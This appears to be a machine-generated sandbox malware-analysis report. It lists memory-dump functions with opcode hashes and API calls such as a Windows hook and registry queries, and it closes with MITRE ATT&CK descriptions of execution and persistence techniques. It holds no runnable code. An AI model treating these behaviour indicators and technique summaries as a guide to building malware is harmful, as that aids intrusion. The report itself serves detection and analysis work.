Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d754c87c3c36ffe714c761ed7cc06dba71b13f258690dd04fb7c270535e21de1
Instruction ID: 5bb6a49d1a15bf58fdd0f4578fad1404c6341f6ca82d9542a8b5f7deb5dbc7fd
Opcode Fuzzy Hash: d754c87c3c36ffe714c761ed7cc06dba71b13f258690dd04fb7c270535e21de1
Instruction Fuzzy Hash: 55F103B4A00228CFCB65EF60C85479DB7B6EF89205F5089EAD509A7740CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA745, Relevance: 3.3, APIs: 2, Instructions: 325COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 158c4c7de6ed89aafd6a3b1156f3ab0935b885ff7fdac0cf002dcd7a200a4dec
Instruction ID: 506705d74f7df7907819690a1e1303a1153ecbb689cfb8d950431c7e157a141a
Opcode Fuzzy Hash: 158c4c7de6ed89aafd6a3b1156f3ab0935b885ff7fdac0cf002dcd7a200a4dec
Instruction Fuzzy Hash: 58E103B4A00228CFCB65EF60C8547ADB7B6EF89205F5089EAD509A7740CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA78D, Relevance: 3.3, APIs: 2, Instructions: 318COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fa692164bb128feebe6fd99f50be9afbba4ce8794ae53bfa0525537eb1741d1f
Instruction ID: 14d3a5dacaf0c524516571937106b8bc94fabaf84bf9f7aaccf18d47aa36c2b5
Opcode Fuzzy Hash: fa692164bb128feebe6fd99f50be9afbba4ce8794ae53bfa0525537eb1741d1f
Instruction Fuzzy Hash: E4E1F3B4A00228CFCB65EF60C8547ADB7B6EF89205F5089EAD509A7740CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA7D5, Relevance: 3.3, APIs: 2, Instructions: 311COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: bf33bb7e4cd2b0c867c6f510f12ffa3c87c3f023c5a3cad95fcaa5dbd2ad09dd
Instruction ID: d4463dfbd4d5feaf09f125c931f3711af18b72fb0c4129129122062813fc0fc6
Opcode Fuzzy Hash: bf33bb7e4cd2b0c867c6f510f12ffa3c87c3f023c5a3cad95fcaa5dbd2ad09dd
Instruction Fuzzy Hash: 55E1F3B4A00228CFCB65EF60C8947ADB7B6EF89205F5089A9D509A7740CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA81D, Relevance: 3.3, APIs: 2, Instructions: 304COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 23863e7d09b1afd40462109d9982e6b699310ee2a840fa93f0e49a1781ff99f6
Instruction ID: 08482fa0fb2d2a257d2bbbede59e9b5bbd08ba98548f448b7d3e5270ef57771c
Opcode Fuzzy Hash: 23863e7d09b1afd40462109d9982e6b699310ee2a840fa93f0e49a1781ff99f6
Instruction Fuzzy Hash: 64D103B4A00228CFCB65EF60C8547ADB7B6EF89205F5089EAD509A7740CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA865, Relevance: 3.3, APIs: 2, Instructions: 297COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 65165c3af99f2da5cb0547207ada5789ebc17dd01da228cbcb6c341b02cc9d43
Instruction ID: 5342ef397657894b98709a638ee5e840032bafe0792304a563f3da50ada1d3ab
Opcode Fuzzy Hash: 65165c3af99f2da5cb0547207ada5789ebc17dd01da228cbcb6c341b02cc9d43
Instruction Fuzzy Hash: 0FD114B4A00228CFCB65EF60C8947ADB7B6EF89205F5089E9D509A7740CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA8AD, Relevance: 3.3, APIs: 2, Instructions: 290COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 44680b49cde33e5cc96a892ae52e3234cf0f5830254f6b4f4470015410dabdd8
Instruction ID: d2e5b7dcae0d519ce5bdca14a07ca4892271bf27b5dbf810156542d5a480b5c7
Opcode Fuzzy Hash: 44680b49cde33e5cc96a892ae52e3234cf0f5830254f6b4f4470015410dabdd8
Instruction Fuzzy Hash: C2D113B4A00228CFCB65EF60C8547ADB7B6EF89205F5088E9D50AA7740DF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA8F5, Relevance: 3.3, APIs: 2, Instructions: 283COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 50557447bd13e9fe4d9d3d49aceb0047f50ea4afaa41f60022499abb4135a982
Instruction ID: 699dc6bded984e419bba75b0977215fab17ae0ed6e29aa765988652719ea56b5
Opcode Fuzzy Hash: 50557447bd13e9fe4d9d3d49aceb0047f50ea4afaa41f60022499abb4135a982
Instruction Fuzzy Hash: 44D103B4A00228CFCB65EF60C8547ADB7B6EF89205F5088A9D609A7740CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA953, Relevance: 3.3, APIs: 2, Instructions: 272COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f4465ee3ab7fbd65fcc9b82d65f3dd65ab46fed59115a5fafc87bf93e7fa8eda
Instruction ID: 51e171758b0209390db1f4298f17aa00896ab549d24710452d153e5a6d613ab0
Opcode Fuzzy Hash: f4465ee3ab7fbd65fcc9b82d65f3dd65ab46fed59115a5fafc87bf93e7fa8eda
Instruction Fuzzy Hash: 85C113B0A00228CFCB65EF60C8547ADB7B6EF89205F5088E9D509A7740CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA99B, Relevance: 3.3, APIs: 2, Instructions: 265COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d5a6194fef59f0c3f5aa6434da09e04d45673adaaa371aace6d2306af566fd7f
Instruction ID: 01cda1331e67fc8f6c0a917eff0d6c0cf23cea1fc9f31aa3e2234a38e55c3222
Opcode Fuzzy Hash: d5a6194fef59f0c3f5aa6434da09e04d45673adaaa371aace6d2306af566fd7f
Instruction Fuzzy Hash: E1C115B4A00228CFCB65EF60C8547ADB7B6EF89205F5089E9D609A7740CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA9E3, Relevance: 3.3, APIs: 2, Instructions: 258COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 627ebb9a36601248d0e892ad4640b6b6674dfc3bed3706c03956a5ec2bd59972
Instruction ID: 3a92e2e3a8539ff627b8beba03c726439c96a128030aa3d5362b1cc98cb66de0
Opcode Fuzzy Hash: 627ebb9a36601248d0e892ad4640b6b6674dfc3bed3706c03956a5ec2bd59972
Instruction Fuzzy Hash: ABB115B4A00224CFCB65EF60C8947ADB7B6EF89205F5088E9D609A7740DF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AAA2B, Relevance: 3.2, APIs: 2, Instructions: 249COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 83f7bbfb7de8e25eb58587595d665880923c5441b4505179ff906c58f7639a71
Instruction ID: cae665456e1b93169661fd9c6376509974f82f923cb1a5c51a0bc38fcf67d08a
Opcode Fuzzy Hash: 83f7bbfb7de8e25eb58587595d665880923c5441b4505179ff906c58f7639a71
Instruction Fuzzy Hash: 95B116B0A00224CFCB65EF60C8947ADB7B6EF89205F5089A9D509A7740DF349E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 003AAA67, Relevance: 3.2, APIs: 2, Instructions: 244COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: af091e0781d9116262791fc8511a0958f3360f2cf52e964f3a2a5b2b816fb6fa
Instruction ID: c59ccd0c07731061e8196bfb2657071300802a9271b9ab26145c76be5985c05f
Opcode Fuzzy Hash: af091e0781d9116262791fc8511a0958f3360f2cf52e964f3a2a5b2b816fb6fa
Instruction Fuzzy Hash: D4B126B0A00224CFCB65EF60C8947ADB7B6EF89205F5088E9D509A7740DF349E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 003AAAAF, Relevance: 3.2, APIs: 2, Instructions: 237COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2a030d7f6ac62b437972917b9af341d2ef4d2eb3fc2c99788ef92b69663e6a7e
Instruction ID: 52424676fff88d878c084445082437d82bf5539808e8f1f1b22e5bb0bd45edea
Opcode Fuzzy Hash: 2a030d7f6ac62b437972917b9af341d2ef4d2eb3fc2c99788ef92b69663e6a7e
Instruction Fuzzy Hash: 59A126B0A00224CFCB65EF60C8947ADB7B6EF89205F5089A9D509A7740DF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AAAF7, Relevance: 3.2, APIs: 2, Instructions: 230COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 19041fa324b1afc8c0ad78b8bca2cc5d5f22359d0dd35cde2e09a107b62eb160
Instruction ID: fff6bdae4e3e6294ec08151c6b8bdf21a90d8fc267b9b115346ee4c786d5c511
Opcode Fuzzy Hash: 19041fa324b1afc8c0ad78b8bca2cc5d5f22359d0dd35cde2e09a107b62eb160
Instruction Fuzzy Hash: A9A116B4A00228CFCB65EF60C8947ADB7B6EF89305F5088A9D509A7740DF349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AAB3F, Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 19b99d61e55ee8fce2f31ec475e3ac9fc16e761a33ab5112970180d2072c3e5c
Instruction ID: d9f540a0b332eba20a08e013bbd513639b0d167268f601561f47b7276b7e03ea
Opcode Fuzzy Hash: 19b99d61e55ee8fce2f31ec475e3ac9fc16e761a33ab5112970180d2072c3e5c
Instruction Fuzzy Hash: 10A115B0A00228CFCB65EF60C8947ADB7B6EF89305F5088A9D509A7740DF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AAB87, Relevance: 3.2, APIs: 2, Instructions: 216COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1a7a6a348df6e6da1b2fc507b0147d87a59952b185802e7510504d60087cb460
Instruction ID: 5f7d7d4ac32fc436e6a3bb964481ebc19ff7a7d815a38255c8684044d834b313
Opcode Fuzzy Hash: 1a7a6a348df6e6da1b2fc507b0147d87a59952b185802e7510504d60087cb460
Instruction Fuzzy Hash: E59126B4A00228CFCB65EF60C8947ADB7B6EF89305F5088A9D509A7740DF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AABCF, Relevance: 3.2, APIs: 2, Instructions: 209COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 85ab957bcda4f6ca9cdcbaf2792a10e2936168b3bde17acc5a7f650977e51e9a
Instruction ID: d42c2d3642a26eaed7fb955d9a25b67d4b2629e78f480525408e3008ada89e19
Opcode Fuzzy Hash: 85ab957bcda4f6ca9cdcbaf2792a10e2936168b3bde17acc5a7f650977e51e9a
Instruction Fuzzy Hash: 529125B0A00224CFCB65EB60C8947ADB7B6EF89205F5089A9D50AA7740DF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AAC17, Relevance: 1.7, APIs: 1, Instructions: 202COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 04a79033fbb1a58f63a677d48056e2b09c9db05fc261b9e3daef7e627119165b
Instruction ID: 967a15d940e2dd21d8b7e63a0dc928994fe82268d4896477a4ae791003c29c8f
Opcode Fuzzy Hash: 04a79033fbb1a58f63a677d48056e2b09c9db05fc261b9e3daef7e627119165b
Instruction Fuzzy Hash: 5C8135B0A00224CFCB65EB60C8947ADB7B6FF89305F5089A9D50AA7740DF349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AAC5F, Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4e7a944ec72f44bb2ef95e7a7627b6d3d1e93aca87e4df30c455fe075e5efcd0
Instruction ID: c3ee8fc0497f5c6dfc9d8a09c140e117e568a3381a620d4718e3d7cde1843e80
Opcode Fuzzy Hash: 4e7a944ec72f44bb2ef95e7a7627b6d3d1e93aca87e4df30c455fe075e5efcd0
Instruction Fuzzy Hash: 478145B0A00224CFCB65EB60C8947ADB7B6EF89305F5089A9D50AA7780DF349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AACA7, Relevance: 1.7, APIs: 1, Instructions: 188COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 477f80f1fd311b9dac68cf01e53e738dfec4000324be56dab532bd8b4ec6052b
Instruction ID: 232eb1971dc98b19d53c9b313aa5d7a49cf6a1d013ebeda63639db01972f49ea
Opcode Fuzzy Hash: 477f80f1fd311b9dac68cf01e53e738dfec4000324be56dab532bd8b4ec6052b
Instruction Fuzzy Hash: 307155B0A00224CFCB65EB60C8947ADB7B6AF89305F5089A9D50AA7780DF349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00BE7BCC, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00BE7C91

Memory Dump Source

Source File: 0000000E.00000002.705516461.0000000000BE0000.00000040.00000001.sdmp, Offset: 00BE0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 67fe70da7196a55dd4dcbc02d39b69cb0a11ff4a6ef5ccc78b1bf411fc150698
Instruction ID: 303bb3fd6eabeaa9c7d2dbb5e01a5b8ffc712320d70525432ca4e41672052041
Opcode Fuzzy Hash: 67fe70da7196a55dd4dcbc02d39b69cb0a11ff4a6ef5ccc78b1bf411fc150698
Instruction Fuzzy Hash: 9141E2B1D04259DFCB10CFAAC484A8EBBF5FF48300F25846AE819AB310D774A905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BE7BD8, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00BE7C91

Memory Dump Source

Source File: 0000000E.00000002.705516461.0000000000BE0000.00000040.00000001.sdmp, Offset: 00BE0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: bfa65116d225436ed49aaec51ac2482319cc903b7064ee312630758a4aedf1ca
Instruction ID: fdfb353c7e7f6712a75e7d973123780b3d56e22e8593ef6fe36d66700746723d
Opcode Fuzzy Hash: bfa65116d225436ed49aaec51ac2482319cc903b7064ee312630758a4aedf1ca
Instruction Fuzzy Hash: E431D1B1D042599FCB10CF9AC884A8EBBF9FF48310F25856AE819AB310D775A905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 021F41F8, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 021F4273

Memory Dump Source

Source File: 0000000E.00000002.705700867.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 7591b78f79ba98b92fa083b11e75b3192270209d14da7120c2c8c7ec45fd18df
Instruction ID: f557a7252516a462ba2c8fdff6962a599d184e17ce47e06b5017dda46603ea5e
Opcode Fuzzy Hash: 7591b78f79ba98b92fa083b11e75b3192270209d14da7120c2c8c7ec45fd18df
Instruction Fuzzy Hash: B52113B19002199FDB54CF99D844BEEFBF4EB88314F14842AE529A7250C774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 000FD578, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.704850660.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9962fb6ae41821acaf7a358bf423bc1a602c8d0e6fc8525257a9dc58bba607f
Instruction ID: 2ef1ea71440bb4f27081d271d870e1d7f7350107e5e4fdadd455795401742f08
Opcode Fuzzy Hash: f9962fb6ae41821acaf7a358bf423bc1a602c8d0e6fc8525257a9dc58bba607f
Instruction Fuzzy Hash: 01216A71104208DFDF10CF10D8C4B3ABFA2FB98714F34826AEA098B606C336D806E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0010D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.704869304.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80596164ef29b3c533a57dfefdc90909ef2aa3f6ba7f7fcd6792e786a370a71b
Instruction ID: ec2b5632faa823ab530d75f2045fa54f921c0c7fd96678c2402528c4375e6f20
Opcode Fuzzy Hash: 80596164ef29b3c533a57dfefdc90909ef2aa3f6ba7f7fcd6792e786a370a71b
Instruction Fuzzy Hash: 8621F274604244DFDB14DF54E884B26BB65EB88314F34C6A9E98D4B28AC7BAD807CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0010E674, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.704869304.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b30eedb1a007c4002177aa788f2989d1f25cdcf132fde3d9d1987bb3ec01d999
Instruction ID: 7c90824acb0f5001c4b6446cd953b3e7a31c8e845ab050463e2589d51b395647
Opcode Fuzzy Hash: b30eedb1a007c4002177aa788f2989d1f25cdcf132fde3d9d1987bb3ec01d999
Instruction Fuzzy Hash: CE210774504244DFDB14DF15D4C4B26BBA1FB98314F34CAADE9894B286C7B7E806CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000FD573, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.704850660.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8d78af638c6358c301d7c378cb20591df36e4ce17a6414c0c01c8765d088f2
Instruction ID: bae9ae39037e53ac3cc0ff306abaa23596c69a627626ed793676cbf99f77b052
Opcode Fuzzy Hash: 3c8d78af638c6358c301d7c378cb20591df36e4ce17a6414c0c01c8765d088f2
Instruction Fuzzy Hash: CA11E676404284CFCF12CF10D5C4B26BFB2FB99314F28C5AAD9094B616C336D856DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0010D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.704869304.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 509e5f71b128a052adfbfb3bdac0dea331848e4110fb77d3323e346de4edc6d2
Instruction ID: 3ff1bd2891abb7974033f101187cb5b336140ae6bc7f2ee8e41aa527eb26a005
Opcode Fuzzy Hash: 509e5f71b128a052adfbfb3bdac0dea331848e4110fb77d3323e346de4edc6d2
Instruction Fuzzy Hash: 01119D75504280DFCB11CF54E5C4B15FFA1FB84314F28C6AAE8494B69AC37AD84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0010E66F, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.704869304.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 509e5f71b128a052adfbfb3bdac0dea331848e4110fb77d3323e346de4edc6d2
Instruction ID: a41211e20de5582efba1e3e0dd0ebdd348c3284ddf61cf1adf39ecdb296fc313
Opcode Fuzzy Hash: 509e5f71b128a052adfbfb3bdac0dea331848e4110fb77d3323e346de4edc6d2
Instruction Fuzzy Hash: 24119079504280DFCB15CF14D5C4B15BFA1FB84314F28CAADD8894B696C37AD85ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 000FD795, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.704850660.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ae723ae959c7157ac2c6d4a6360c8251ffa88736023e1d962be459c209b0dde
Instruction ID: e7be9976ba081b0cc0c0ac50163327b43d0281caff3773e1f018aa6f82914ec1
Opcode Fuzzy Hash: 8ae723ae959c7157ac2c6d4a6360c8251ffa88736023e1d962be459c209b0dde
Instruction Fuzzy Hash: E801F73000C3589AE7609A16CC84B7BBBD9DF51324F18C55BDB045F582D3789C00D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 000FD794, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.704850660.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4361e7a37180e1a4be3292001deb15c9b692adf3ac756039291729172638ca
Instruction ID: ee60356d834d449ff0a3d4e9b2804989c36517970eb11c8e98dc3a053d24cbc2
Opcode Fuzzy Hash: 7c4361e7a37180e1a4be3292001deb15c9b692adf3ac756039291729172638ca
Instruction Fuzzy Hash: C6F04F714083849AE7608A15C888B66FFD8EB91764F18C55AED085F686C3789844DBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

